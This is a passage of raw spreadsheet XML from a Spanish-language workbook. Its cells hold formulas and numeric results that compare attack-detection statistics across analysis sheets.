        <f>'(D) - Análisis Resultados I - S'!Z137</f>
        <v>0.2417624945</v>
      </c>
      <c r="X45" s="564">
        <f>'(D) - Análisis Resultados I - S'!Z136</f>
        <v>0.08386775763</v>
      </c>
      <c r="Y45" s="844">
        <f>'(D) - Análisis Resultados III -'!O22</f>
        <v>0.4209305402</v>
      </c>
      <c r="Z45" s="69">
        <v>0.3684210526315789</v>
      </c>
    </row>
    <row r="46">
      <c r="B46" s="806"/>
      <c r="C46" s="807"/>
      <c r="D46" s="838"/>
      <c r="E46" s="838"/>
      <c r="F46" s="838"/>
      <c r="G46" s="838"/>
      <c r="H46" s="839"/>
      <c r="I46" s="806"/>
      <c r="K46" s="845" t="s">
        <v>209</v>
      </c>
      <c r="L46" s="846">
        <f>'(D) - Análisis Resultados I - S'!AA139</f>
        <v>0.6153846154</v>
      </c>
      <c r="M46" s="637">
        <f>'(D) - Análisis Resultados I - S'!AA138</f>
        <v>0.5384615385</v>
      </c>
      <c r="N46" s="637">
        <f>'(D) - Análisis Resultados I - S'!AA137</f>
        <v>0.2307692308</v>
      </c>
      <c r="O46" s="637">
        <f>'(D) - Análisis Resultados I - S'!AA136</f>
        <v>0</v>
      </c>
      <c r="P46" s="847">
        <f>'(D) - Análisis Resultados II - '!P22</f>
        <v>0.6153846154</v>
      </c>
      <c r="T46" s="845" t="s">
        <v>209</v>
      </c>
      <c r="U46" s="843">
        <f>'(D) - Análisis Resultados I - S'!AA139</f>
        <v>0.6153846154</v>
      </c>
      <c r="V46" s="564">
        <f>'(D) - Análisis Resultados I - S'!AA138</f>
        <v>0.5384615385</v>
      </c>
      <c r="W46" s="564">
        <f>'(D) - Análisis Resultados I - S'!AA137</f>
        <v>0.2307692308</v>
      </c>
      <c r="X46" s="564">
        <f>'(D) - Análisis Resultados I - S'!AA136</f>
        <v>0</v>
      </c>
      <c r="Y46" s="844">
        <f>'(D) - Análisis Resultados III -'!P22</f>
        <v>0.5384615385</v>
      </c>
      <c r="Z46" s="69">
        <v>0.6153846153846154</v>
      </c>
    </row>
    <row r="47">
      <c r="B47" s="806"/>
      <c r="C47" s="807"/>
      <c r="D47" s="838"/>
      <c r="E47" s="838"/>
      <c r="F47" s="838"/>
      <c r="G47" s="838"/>
      <c r="H47" s="839"/>
      <c r="I47" s="806"/>
      <c r="K47" s="845" t="s">
        <v>664</v>
      </c>
      <c r="L47" s="846">
        <f>'(D) - Análisis Resultados I - S'!AB139</f>
        <v>0.5</v>
      </c>
      <c r="M47" s="637">
        <f>'(D) - Análisis Resultados I - S'!AB138</f>
        <v>0.5</v>
      </c>
      <c r="N47" s="637">
        <f>'(D) - Análisis Resultados I - S'!AB137</f>
        <v>0.25</v>
      </c>
      <c r="O47" s="637">
        <f>'(D) - Análisis Resultados I - S'!AB136</f>
        <v>0.125</v>
      </c>
      <c r="P47" s="847">
        <f>'(D) - Análisis Resultados II - '!Q22</f>
        <v>0.6111111111</v>
      </c>
      <c r="T47" s="845" t="s">
        <v>664</v>
      </c>
      <c r="U47" s="848">
        <f>'(D) - Análisis Resultados I - S'!AB139</f>
        <v>0.5</v>
      </c>
      <c r="V47" s="637">
        <f>'(D) - Análisis Resultados I - S'!AB138</f>
        <v>0.5</v>
      </c>
      <c r="W47" s="637">
        <f>'(D) - Análisis Resultados I - S'!AB137</f>
        <v>0.25</v>
      </c>
      <c r="X47" s="637">
        <f>'(D) - Análisis Resultados I - S'!AB136</f>
        <v>0.125</v>
      </c>
      <c r="Y47" s="850">
        <f>'(D) - Análisis Resultados III -'!Q22</f>
        <v>0.5</v>
      </c>
      <c r="Z47" s="69">
        <v>0.6111111111111112</v>
      </c>
    </row>
    <row r="48">
      <c r="B48" s="806"/>
      <c r="C48" s="807"/>
      <c r="D48" s="838"/>
      <c r="E48" s="838"/>
      <c r="F48" s="838"/>
      <c r="G48" s="838"/>
      <c r="H48" s="839"/>
      <c r="I48" s="806"/>
      <c r="K48" s="845" t="s">
        <v>357</v>
      </c>
      <c r="L48" s="846">
        <f>'(D) - Análisis Resultados I - S'!AC139</f>
        <v>0.6</v>
      </c>
      <c r="M48" s="637">
        <f>'(D) - Análisis Resultados I - S'!AC138</f>
        <v>0.5</v>
      </c>
      <c r="N48" s="637">
        <f>'(D) - Análisis Resultados I - S'!AC137</f>
        <v>0.3</v>
      </c>
      <c r="O48" s="637">
        <f>'(D) - Análisis Resultados I - S'!AC136</f>
        <v>0.1</v>
      </c>
      <c r="P48" s="847">
        <f>'(D) - Análisis Resultados II - '!R22</f>
        <v>0.6</v>
      </c>
      <c r="T48" s="845" t="s">
        <v>357</v>
      </c>
      <c r="U48" s="848">
        <f>'(D) - Análisis Resultados I - S'!AC139</f>
        <v>0.6</v>
      </c>
      <c r="V48" s="637">
        <f>'(D) - Análisis Resultados I - S'!AC138</f>
        <v>0.5</v>
      </c>
      <c r="W48" s="637">
        <f>'(D) - Análisis Resultados I - S'!AC137</f>
        <v>0.3</v>
      </c>
      <c r="X48" s="637">
        <f>'(D) - Análisis Resultados I - S'!AC136</f>
        <v>0.1</v>
      </c>
      <c r="Y48" s="850">
        <f>'(D) - Análisis Resultados III -'!R22</f>
        <v>0.8</v>
      </c>
      <c r="Z48" s="69">
        <v>0.6</v>
      </c>
    </row>
    <row r="49">
      <c r="B49" s="806"/>
      <c r="C49" s="807"/>
      <c r="D49" s="838"/>
      <c r="E49" s="838"/>
      <c r="F49" s="838"/>
      <c r="G49" s="838"/>
      <c r="H49" s="839"/>
      <c r="I49" s="806"/>
      <c r="K49" s="845" t="s">
        <v>310</v>
      </c>
      <c r="L49" s="846">
        <f>'(D) - Análisis Resultados I - S'!AD139</f>
        <v>0.00119760479</v>
      </c>
      <c r="M49" s="637">
        <f>'(D) - Análisis Resultados I - S'!AD138</f>
        <v>0.00119760479</v>
      </c>
      <c r="N49" s="637">
        <f>'(D) - Análisis Resultados I - S'!AD137</f>
        <v>0.00119760479</v>
      </c>
      <c r="O49" s="637">
        <f>'(D) - Análisis Resultados I - S'!AD136</f>
        <v>0</v>
      </c>
      <c r="P49" s="847">
        <f>'(D) - Análisis Resultados II - '!S22</f>
        <v>0.2012371907</v>
      </c>
      <c r="T49" s="845" t="s">
        <v>310</v>
      </c>
      <c r="U49" s="848">
        <f>'(D) - Análisis Resultados I - S'!AD139</f>
        <v>0.00119760479</v>
      </c>
      <c r="V49" s="637">
        <f>'(D) - Análisis Resultados I - S'!AD138</f>
        <v>0.00119760479</v>
      </c>
      <c r="W49" s="637">
        <f>'(D) - Análisis Resultados I - S'!AD137</f>
        <v>0.00119760479</v>
      </c>
      <c r="X49" s="637">
        <f>'(D) - Análisis Resultados I - S'!AD136</f>
        <v>0</v>
      </c>
      <c r="Y49" s="850">
        <f>'(D) - Análisis Resultados III -'!S22</f>
        <v>0.3968356775</v>
      </c>
      <c r="Z49" s="69">
        <v>0.20123719066130832</v>
      </c>
    </row>
    <row r="50">
      <c r="B50" s="806"/>
      <c r="C50" s="807"/>
      <c r="D50" s="808"/>
      <c r="E50" s="808"/>
      <c r="F50" s="808"/>
      <c r="G50" s="808"/>
      <c r="H50" s="809"/>
      <c r="I50" s="806"/>
      <c r="K50" s="845" t="s">
        <v>292</v>
      </c>
      <c r="L50" s="846">
        <f>'(D) - Análisis Resultados I - S'!AE139</f>
        <v>0.4</v>
      </c>
      <c r="M50" s="637">
        <f>'(D) - Análisis Resultados I - S'!AE138</f>
        <v>0.2</v>
      </c>
      <c r="N50" s="637">
        <f>'(D) - Análisis Resultados I - S'!AE137</f>
        <v>0.2</v>
      </c>
      <c r="O50" s="637">
        <f>'(D) - Análisis Resultados I - S'!AE136</f>
        <v>0</v>
      </c>
      <c r="P50" s="847">
        <f>'(D) - Análisis Resultados II - '!T22</f>
        <v>0.6</v>
      </c>
      <c r="T50" s="845" t="s">
        <v>292</v>
      </c>
      <c r="U50" s="848">
        <f>'(D) - Análisis Resultados I - S'!AE139</f>
        <v>0.4</v>
      </c>
      <c r="V50" s="637">
        <f>'(D) - Análisis Resultados I - S'!AE138</f>
        <v>0.2</v>
      </c>
      <c r="W50" s="637">
        <f>'(D) - Análisis Resultados I - S'!AE137</f>
        <v>0.2</v>
      </c>
      <c r="X50" s="637">
        <f>'(D) - Análisis Resultados I - S'!AE136</f>
        <v>0</v>
      </c>
      <c r="Y50" s="850">
        <f>'(D) - Análisis Resultados III -'!T22</f>
        <v>0.4</v>
      </c>
      <c r="Z50" s="69">
        <v>0.6</v>
      </c>
    </row>
    <row r="51">
      <c r="B51" s="806"/>
      <c r="C51" s="807"/>
      <c r="D51" s="808"/>
      <c r="E51" s="808"/>
      <c r="F51" s="808"/>
      <c r="G51" s="808"/>
      <c r="H51" s="809"/>
      <c r="I51" s="806"/>
      <c r="K51" s="851" t="s">
        <v>558</v>
      </c>
      <c r="L51" s="852">
        <f>'(D) - Análisis Resultados I - S'!AF139</f>
        <v>0.5</v>
      </c>
      <c r="M51" s="853">
        <f>'(D) - Análisis Resultados I - S'!AF138</f>
        <v>0.5</v>
      </c>
      <c r="N51" s="853">
        <f>'(D) - Análisis Resultados I - S'!AF137</f>
        <v>0.5</v>
      </c>
      <c r="O51" s="853">
        <f>'(D) - Análisis Resultados I - S'!AF136</f>
        <v>0.01</v>
      </c>
      <c r="P51" s="854">
        <f>'(D) - Análisis Resultados II - '!U22</f>
        <v>0.3181818182</v>
      </c>
      <c r="T51" s="851" t="s">
        <v>558</v>
      </c>
      <c r="U51" s="855">
        <f>'(D) - Análisis Resultados I - S'!AF139</f>
        <v>0.5</v>
      </c>
      <c r="V51" s="689">
        <f>'(D) - Análisis Resultados I - S'!AF138</f>
        <v>0.5</v>
      </c>
      <c r="W51" s="689">
        <f>'(D) - Análisis Resultados I - S'!AF137</f>
        <v>0.5</v>
      </c>
      <c r="X51" s="689">
        <f>'(D) - Análisis Resultados I - S'!AF136</f>
        <v>0.01</v>
      </c>
      <c r="Y51" s="856">
        <f>'(D) - Análisis Resultados III -'!U22</f>
        <v>0.5227272727</v>
      </c>
      <c r="Z51" s="69">
        <v>0.3181818181818182</v>
      </c>
    </row>
    <row r="52">
      <c r="B52" s="806"/>
      <c r="C52" s="807"/>
      <c r="D52" s="808"/>
      <c r="E52" s="808"/>
      <c r="F52" s="808"/>
      <c r="G52" s="808"/>
      <c r="H52" s="809"/>
      <c r="I52" s="806"/>
      <c r="L52" s="789"/>
      <c r="M52" s="789"/>
      <c r="N52" s="789"/>
      <c r="O52" s="789"/>
      <c r="P52" s="789"/>
    </row>
    <row r="53">
      <c r="B53" s="806"/>
      <c r="C53" s="807"/>
      <c r="D53" s="808"/>
      <c r="E53" s="808"/>
      <c r="F53" s="808"/>
      <c r="G53" s="808"/>
      <c r="H53" s="809"/>
      <c r="I53" s="806"/>
      <c r="L53" s="785"/>
      <c r="M53" s="785"/>
      <c r="N53" s="785"/>
      <c r="O53" s="785"/>
      <c r="P53" s="785"/>
    </row>
    <row r="54">
      <c r="B54" s="806"/>
      <c r="C54" s="807"/>
      <c r="D54" s="808"/>
      <c r="E54" s="808"/>
      <c r="F54" s="808"/>
      <c r="G54" s="808"/>
      <c r="H54" s="809"/>
      <c r="I54" s="806"/>
      <c r="L54" s="785"/>
      <c r="M54" s="785"/>
      <c r="N54" s="785"/>
      <c r="O54" s="785"/>
      <c r="P54" s="785"/>
      <c r="AE54" s="727"/>
      <c r="AF54" s="698"/>
      <c r="AG54" s="698"/>
    </row>
    <row r="55">
      <c r="B55" s="806"/>
      <c r="C55" s="807"/>
      <c r="D55" s="808"/>
      <c r="E55" s="808"/>
      <c r="F55" s="808"/>
      <c r="G55" s="808"/>
      <c r="H55" s="809"/>
      <c r="I55" s="806"/>
      <c r="L55" s="785"/>
      <c r="M55" s="785"/>
      <c r="N55" s="785"/>
      <c r="O55" s="785"/>
      <c r="P55" s="785"/>
      <c r="AE55" s="698"/>
      <c r="AF55" s="336"/>
      <c r="AG55" s="336"/>
    </row>
    <row r="56">
      <c r="B56" s="806"/>
      <c r="C56" s="807"/>
      <c r="D56" s="808"/>
      <c r="E56" s="808"/>
      <c r="F56" s="808"/>
      <c r="G56" s="808"/>
      <c r="H56" s="809"/>
      <c r="I56" s="806"/>
      <c r="AE56" s="698"/>
      <c r="AF56" s="336"/>
      <c r="AG56" s="336"/>
    </row>
    <row r="57">
      <c r="B57" s="806"/>
      <c r="C57" s="807"/>
      <c r="D57" s="808"/>
      <c r="E57" s="808"/>
      <c r="F57" s="808"/>
      <c r="G57" s="808"/>
      <c r="H57" s="809"/>
      <c r="I57" s="806"/>
      <c r="AE57" s="698"/>
      <c r="AF57" s="336"/>
      <c r="AG57" s="336"/>
    </row>
    <row r="58">
      <c r="B58" s="806"/>
      <c r="C58" s="807"/>
      <c r="D58" s="808"/>
      <c r="E58" s="808"/>
      <c r="F58" s="808"/>
      <c r="G58" s="808"/>
      <c r="H58" s="809"/>
      <c r="I58" s="806"/>
      <c r="AE58" s="698"/>
      <c r="AF58" s="336"/>
      <c r="AG58" s="336"/>
    </row>
    <row r="59">
      <c r="B59" s="806"/>
      <c r="C59" s="807"/>
      <c r="D59" s="808"/>
      <c r="E59" s="808"/>
      <c r="F59" s="808"/>
      <c r="G59" s="808"/>
      <c r="H59" s="809"/>
      <c r="I59" s="806"/>
      <c r="AE59" s="698"/>
      <c r="AF59" s="336"/>
      <c r="AG59" s="336"/>
    </row>
    <row r="60">
      <c r="B60" s="806"/>
      <c r="C60" s="807"/>
      <c r="D60" s="808"/>
      <c r="E60" s="808"/>
      <c r="F60" s="808"/>
      <c r="G60" s="808"/>
      <c r="H60" s="809"/>
      <c r="I60" s="806"/>
      <c r="AE60" s="698"/>
      <c r="AF60" s="336"/>
      <c r="AG60" s="336"/>
    </row>
    <row r="61">
      <c r="B61" s="806"/>
      <c r="C61" s="807"/>
      <c r="D61" s="808"/>
      <c r="E61" s="808"/>
      <c r="F61" s="808"/>
      <c r="G61" s="808"/>
      <c r="H61" s="809"/>
      <c r="I61" s="806"/>
      <c r="AE61" s="698"/>
      <c r="AF61" s="336"/>
      <c r="AG61" s="336"/>
    </row>
    <row r="62">
      <c r="B62" s="806"/>
      <c r="C62" s="807"/>
      <c r="D62" s="808"/>
      <c r="E62" s="808"/>
      <c r="F62" s="808"/>
      <c r="G62" s="808"/>
      <c r="H62" s="809"/>
      <c r="I62" s="806"/>
      <c r="AE62" s="698"/>
      <c r="AF62" s="336"/>
      <c r="AG62" s="336"/>
    </row>
    <row r="63">
      <c r="B63" s="806"/>
      <c r="C63" s="807"/>
      <c r="D63" s="808"/>
      <c r="E63" s="808"/>
      <c r="F63" s="808"/>
      <c r="G63" s="808"/>
      <c r="H63" s="809"/>
      <c r="I63" s="806"/>
      <c r="AE63" s="698"/>
      <c r="AF63" s="336"/>
      <c r="AG63" s="336"/>
    </row>
    <row r="64">
      <c r="B64" s="806"/>
      <c r="C64" s="807"/>
      <c r="D64" s="808"/>
      <c r="E64" s="808"/>
      <c r="F64" s="808"/>
      <c r="G64" s="808"/>
      <c r="H64" s="809"/>
      <c r="I64" s="806"/>
      <c r="AE64" s="698"/>
      <c r="AF64" s="336"/>
      <c r="AG64" s="336"/>
    </row>
    <row r="65">
      <c r="B65" s="806"/>
      <c r="C65" s="807"/>
      <c r="D65" s="808"/>
      <c r="E65" s="808"/>
      <c r="F65" s="808"/>
      <c r="G65" s="808"/>
      <c r="H65" s="809"/>
      <c r="I65" s="806"/>
      <c r="AE65" s="698"/>
      <c r="AF65" s="336"/>
      <c r="AG65" s="336"/>
    </row>
    <row r="66">
      <c r="B66" s="806"/>
      <c r="C66" s="807"/>
      <c r="D66" s="808"/>
      <c r="E66" s="808"/>
      <c r="F66" s="808"/>
      <c r="G66" s="808"/>
      <c r="H66" s="809"/>
      <c r="I66" s="806"/>
      <c r="AE66" s="698"/>
      <c r="AF66" s="336"/>
      <c r="AG66" s="336"/>
    </row>
    <row r="67">
      <c r="B67" s="806"/>
      <c r="C67" s="807"/>
      <c r="D67" s="808"/>
      <c r="E67" s="808"/>
      <c r="F67" s="808"/>
      <c r="G67" s="808"/>
      <c r="H67" s="809"/>
      <c r="I67" s="806"/>
      <c r="AE67" s="698"/>
      <c r="AF67" s="336"/>
      <c r="AG67" s="336"/>
    </row>
    <row r="68">
      <c r="B68" s="806"/>
      <c r="C68" s="807"/>
      <c r="D68" s="808"/>
      <c r="E68" s="808"/>
      <c r="F68" s="808"/>
      <c r="G68" s="808"/>
      <c r="H68" s="809"/>
      <c r="I68" s="806"/>
    </row>
    <row r="69">
      <c r="B69" s="806"/>
      <c r="C69" s="807"/>
      <c r="D69" s="808"/>
      <c r="E69" s="808"/>
      <c r="F69" s="808"/>
      <c r="G69" s="808"/>
      <c r="H69" s="809"/>
      <c r="I69" s="806"/>
      <c r="AE69" s="727"/>
      <c r="AF69" s="698"/>
      <c r="AG69" s="698"/>
    </row>
    <row r="70">
      <c r="B70" s="806"/>
      <c r="C70" s="807"/>
      <c r="D70" s="808"/>
      <c r="E70" s="808"/>
      <c r="F70" s="808"/>
      <c r="G70" s="808"/>
      <c r="H70" s="809"/>
      <c r="I70" s="806"/>
      <c r="AE70" s="698"/>
      <c r="AF70" s="173"/>
      <c r="AG70" s="173"/>
    </row>
    <row r="71">
      <c r="B71" s="806"/>
      <c r="C71" s="807"/>
      <c r="D71" s="808"/>
      <c r="E71" s="808"/>
      <c r="F71" s="808"/>
      <c r="G71" s="808"/>
      <c r="H71" s="809"/>
      <c r="I71" s="806"/>
      <c r="AE71" s="698"/>
      <c r="AF71" s="336"/>
      <c r="AG71" s="336"/>
    </row>
    <row r="72">
      <c r="B72" s="806"/>
      <c r="C72" s="807"/>
      <c r="D72" s="808"/>
      <c r="E72" s="808"/>
      <c r="F72" s="808"/>
      <c r="G72" s="808"/>
      <c r="H72" s="809"/>
      <c r="I72" s="806"/>
    </row>
    <row r="73">
      <c r="B73" s="806"/>
      <c r="C73" s="807"/>
      <c r="D73" s="808"/>
      <c r="E73" s="808"/>
      <c r="F73" s="808"/>
      <c r="G73" s="808"/>
      <c r="H73" s="809"/>
      <c r="I73" s="806"/>
    </row>
    <row r="74">
      <c r="B74" s="806"/>
      <c r="C74" s="807"/>
      <c r="D74" s="808"/>
      <c r="E74" s="808"/>
      <c r="F74" s="808"/>
      <c r="G74" s="808"/>
      <c r="H74" s="809"/>
      <c r="I74" s="806"/>
    </row>
    <row r="75">
      <c r="B75" s="806"/>
      <c r="C75" s="807"/>
      <c r="D75" s="808"/>
      <c r="E75" s="808"/>
      <c r="F75" s="808"/>
      <c r="G75" s="808"/>
      <c r="H75" s="809"/>
      <c r="I75" s="806"/>
    </row>
    <row r="76">
      <c r="B76" s="806"/>
      <c r="C76" s="807"/>
      <c r="D76" s="808"/>
      <c r="E76" s="808"/>
      <c r="F76" s="808"/>
      <c r="G76" s="808"/>
      <c r="H76" s="809"/>
      <c r="I76" s="806"/>
    </row>
    <row r="77">
      <c r="B77" s="806"/>
      <c r="C77" s="807"/>
      <c r="D77" s="808"/>
      <c r="E77" s="808"/>
      <c r="F77" s="808"/>
      <c r="G77" s="808"/>
      <c r="H77" s="809"/>
      <c r="I77" s="806"/>
    </row>
    <row r="78">
      <c r="B78" s="806"/>
      <c r="C78" s="807"/>
      <c r="D78" s="808"/>
      <c r="E78" s="808"/>
      <c r="F78" s="808"/>
      <c r="G78" s="808"/>
      <c r="H78" s="809"/>
      <c r="I78" s="806"/>
      <c r="K78" s="576" t="s">
        <v>2753</v>
      </c>
      <c r="L78" s="221"/>
      <c r="M78" s="221"/>
      <c r="N78" s="221"/>
      <c r="O78" s="221"/>
      <c r="P78" s="221"/>
      <c r="Q78" s="222"/>
      <c r="T78" s="576" t="s">
        <v>2754</v>
      </c>
      <c r="U78" s="221"/>
      <c r="V78" s="221"/>
      <c r="W78" s="221"/>
      <c r="X78" s="221"/>
      <c r="Y78" s="221"/>
      <c r="Z78" s="222"/>
    </row>
    <row r="79">
      <c r="B79" s="806"/>
      <c r="C79" s="807"/>
      <c r="D79" s="808"/>
      <c r="E79" s="808"/>
      <c r="F79" s="808"/>
      <c r="G79" s="808"/>
      <c r="H79" s="809"/>
      <c r="I79" s="806"/>
      <c r="L79" s="173"/>
      <c r="M79" s="173"/>
      <c r="N79" s="173"/>
      <c r="O79" s="173"/>
      <c r="P79" s="173"/>
    </row>
    <row r="80">
      <c r="B80" s="806"/>
      <c r="C80" s="807"/>
      <c r="D80" s="808"/>
      <c r="E80" s="808"/>
      <c r="F80" s="808"/>
      <c r="G80" s="808"/>
      <c r="H80" s="809"/>
      <c r="I80" s="806"/>
      <c r="L80" s="342" t="s">
        <v>2755</v>
      </c>
      <c r="M80" s="344" t="s">
        <v>2732</v>
      </c>
      <c r="N80" s="20" t="s">
        <v>2660</v>
      </c>
      <c r="O80" s="342" t="s">
        <v>2756</v>
      </c>
      <c r="P80" s="42" t="s">
        <v>2757</v>
      </c>
      <c r="Q80" s="42" t="s">
        <v>2758</v>
      </c>
      <c r="U80" s="753" t="s">
        <v>2755</v>
      </c>
      <c r="V80" s="753" t="s">
        <v>32</v>
      </c>
      <c r="W80" s="753" t="s">
        <v>2660</v>
      </c>
      <c r="X80" s="753" t="s">
        <v>2759</v>
      </c>
      <c r="Y80" s="805" t="s">
        <v>2760</v>
      </c>
      <c r="Z80" s="403" t="s">
        <v>2761</v>
      </c>
      <c r="AA80" s="403"/>
      <c r="AB80" s="753" t="s">
        <v>2762</v>
      </c>
      <c r="AC80" s="805" t="s">
        <v>2763</v>
      </c>
      <c r="AD80" s="403" t="s">
        <v>2764</v>
      </c>
      <c r="AE80" s="403"/>
      <c r="AF80" s="403"/>
      <c r="AG80" s="403"/>
      <c r="AH80" s="403"/>
      <c r="AI80" s="403"/>
      <c r="AJ80" s="533"/>
      <c r="AK80" s="403"/>
      <c r="AL80" s="403"/>
      <c r="AM80" s="403"/>
      <c r="AN80" s="403"/>
      <c r="AO80" s="403"/>
      <c r="AP80" s="403"/>
      <c r="AQ80" s="403"/>
      <c r="AR80" s="403"/>
      <c r="AS80" s="403"/>
      <c r="AT80" s="403"/>
      <c r="AU80" s="403"/>
      <c r="AV80" s="403"/>
      <c r="AW80" s="403"/>
      <c r="AX80" s="403"/>
      <c r="AY80" s="403"/>
      <c r="AZ80" s="403"/>
      <c r="BA80" s="403"/>
      <c r="BB80" s="403"/>
      <c r="BC80" s="403"/>
      <c r="BD80" s="403"/>
      <c r="BE80" s="403"/>
      <c r="BF80" s="403"/>
      <c r="BG80" s="403"/>
      <c r="BH80" s="403"/>
      <c r="BI80" s="403"/>
      <c r="BJ80" s="403"/>
      <c r="BK80" s="403"/>
      <c r="BL80" s="403"/>
      <c r="BM80" s="403"/>
      <c r="BN80" s="403"/>
      <c r="BO80" s="403"/>
      <c r="BP80" s="403"/>
      <c r="BQ80" s="403"/>
      <c r="BR80" s="403"/>
      <c r="BS80" s="403"/>
      <c r="BT80" s="403"/>
      <c r="BU80" s="403"/>
      <c r="BV80" s="403"/>
      <c r="BW80" s="403"/>
      <c r="BX80" s="403"/>
      <c r="BY80" s="403"/>
      <c r="BZ80" s="403"/>
      <c r="CA80" s="403"/>
      <c r="CB80" s="403"/>
      <c r="CC80" s="403"/>
      <c r="CD80" s="403"/>
      <c r="CE80" s="403"/>
      <c r="CF80" s="403"/>
      <c r="CG80" s="403"/>
      <c r="CH80" s="403"/>
      <c r="CI80" s="403"/>
      <c r="CJ80" s="403"/>
      <c r="CK80" s="403"/>
      <c r="CL80" s="403"/>
      <c r="CM80" s="403"/>
      <c r="CN80" s="403"/>
      <c r="CO80" s="403"/>
      <c r="CP80" s="403"/>
      <c r="CQ80" s="403"/>
      <c r="CR80" s="403"/>
      <c r="CS80" s="403"/>
    </row>
    <row r="81">
      <c r="B81" s="806"/>
      <c r="C81" s="807"/>
      <c r="D81" s="808"/>
      <c r="E81" s="808"/>
      <c r="F81" s="808"/>
      <c r="G81" s="808"/>
      <c r="H81" s="809"/>
      <c r="I81" s="806"/>
      <c r="K81" s="497" t="s">
        <v>2108</v>
      </c>
      <c r="L81" s="857">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AI$131)
</f>
        <v>0.01073694485</v>
      </c>
      <c r="M81" s="858">
        <f>'(D) - Análisis Resultados II - '!X22</f>
        <v>0.03759030022</v>
      </c>
      <c r="N81" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K81)</f>
        <v>1</v>
      </c>
      <c r="O81" s="860" t="b">
        <f t="shared" ref="O81:O160" si="3">L81=M81</f>
        <v>0</v>
      </c>
      <c r="P81" s="569">
        <f t="shared" ref="P81:P160" si="4">IF(OR(L81 = "-", M81 = "-"), "-", IF(VALUE(L81) &gt; VALUE(M81), 1, 0))
</f>
        <v>0</v>
      </c>
      <c r="Q81" s="569">
        <f t="shared" ref="Q81:Q160" si="5">IF(OR(L81 = "-", M81 = "-"), "-", IF(VALUE(L81) &lt; VALUE(M81), 1, 0))
</f>
        <v>1</v>
      </c>
      <c r="T81" s="861" t="s">
        <v>2108</v>
      </c>
      <c r="U81" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AI$131)
</f>
        <v>0.01073694485</v>
      </c>
      <c r="V81" s="69">
        <v>0.675347721822542</v>
      </c>
      <c r="W81" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T81)</f>
        <v>1</v>
      </c>
      <c r="X81" s="860" t="b">
        <f t="shared" ref="X81:X160" si="6">U81=V81</f>
        <v>0</v>
      </c>
      <c r="Y81" s="569">
        <f t="shared" ref="Y81:Y160" si="7">IF(OR(U81 = "-", V81 = "-"), "-", IF(VALUE(U81) &gt; VALUE(V81), 1, 0))
</f>
        <v>0</v>
      </c>
      <c r="Z81" s="569">
        <f t="shared" ref="Z81:Z160" si="8">IF(OR(U81 = "-", V81 = "-"), "-", IF(VALUE(U81) &lt; VALUE(V81), 1, 0))
</f>
        <v>1</v>
      </c>
      <c r="AA81" s="69"/>
      <c r="AB81" s="860" t="b">
        <f t="shared" ref="AB81:AB160" si="9">V81=M81</f>
        <v>0</v>
      </c>
      <c r="AC81" s="569">
        <f t="shared" ref="AC81:AC160" si="10">IF(OR(M81 = "-", V81 = "-"), "-", IF(VALUE(M81) &gt; VALUE(V81), 1, 0))
</f>
        <v>0</v>
      </c>
      <c r="AD81" s="569">
        <f t="shared" ref="AD81:AD160" si="11">IF(OR(Y82 = "-", Z82 = "-"), "-", IF(VALUE(Y82) &lt; VALUE(Z82), 1, 0))
</f>
        <v>0</v>
      </c>
      <c r="AE81" s="368"/>
      <c r="AF81" s="368"/>
      <c r="AG81" s="368"/>
      <c r="AH81" s="368"/>
      <c r="AI81" s="368"/>
      <c r="AJ81" s="368"/>
      <c r="AK81" s="368"/>
      <c r="AL81" s="368"/>
      <c r="AM81" s="368"/>
      <c r="AN81" s="368"/>
      <c r="AO81" s="368"/>
      <c r="AP81" s="368"/>
      <c r="AQ81" s="368"/>
      <c r="AR81" s="368"/>
      <c r="AS81" s="368"/>
      <c r="AT81" s="368"/>
      <c r="AU81" s="368"/>
      <c r="AV81" s="368"/>
      <c r="AW81" s="368"/>
      <c r="AX81" s="368"/>
      <c r="AY81" s="368"/>
      <c r="AZ81" s="368"/>
      <c r="BA81" s="368"/>
      <c r="BB81" s="368"/>
      <c r="BC81" s="368"/>
      <c r="BD81" s="368"/>
      <c r="BE81" s="368"/>
      <c r="BF81" s="368"/>
      <c r="BG81" s="368"/>
      <c r="BH81" s="368"/>
      <c r="BI81" s="368"/>
      <c r="BJ81" s="368"/>
      <c r="BK81" s="368"/>
      <c r="BL81" s="368"/>
      <c r="BM81" s="368"/>
      <c r="BN81" s="368"/>
      <c r="BO81" s="368"/>
      <c r="BP81" s="368"/>
      <c r="BQ81" s="368"/>
      <c r="BR81" s="368"/>
      <c r="BS81" s="368"/>
      <c r="BT81" s="368"/>
      <c r="BU81" s="368"/>
      <c r="BV81" s="368"/>
      <c r="BW81" s="368"/>
      <c r="BX81" s="368"/>
      <c r="BY81" s="368"/>
      <c r="BZ81" s="368"/>
      <c r="CA81" s="368"/>
      <c r="CB81" s="368"/>
      <c r="CC81" s="368"/>
      <c r="CD81" s="368"/>
      <c r="CE81" s="368"/>
      <c r="CF81" s="368"/>
      <c r="CG81" s="368"/>
      <c r="CH81" s="368"/>
      <c r="CI81" s="368"/>
      <c r="CJ81" s="368"/>
      <c r="CK81" s="368"/>
      <c r="CL81" s="368"/>
      <c r="CM81" s="368"/>
      <c r="CN81" s="368"/>
      <c r="CO81" s="368"/>
      <c r="CP81" s="368"/>
      <c r="CQ81" s="368"/>
      <c r="CR81" s="368"/>
      <c r="CS81" s="368"/>
      <c r="CT81" s="368"/>
      <c r="CU81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GF22</f>
        <v/>
      </c>
      <c r="CV81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GG22</f>
        <v/>
      </c>
      <c r="CW81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GH22</f>
        <v/>
      </c>
      <c r="CX81" s="368" t="str">
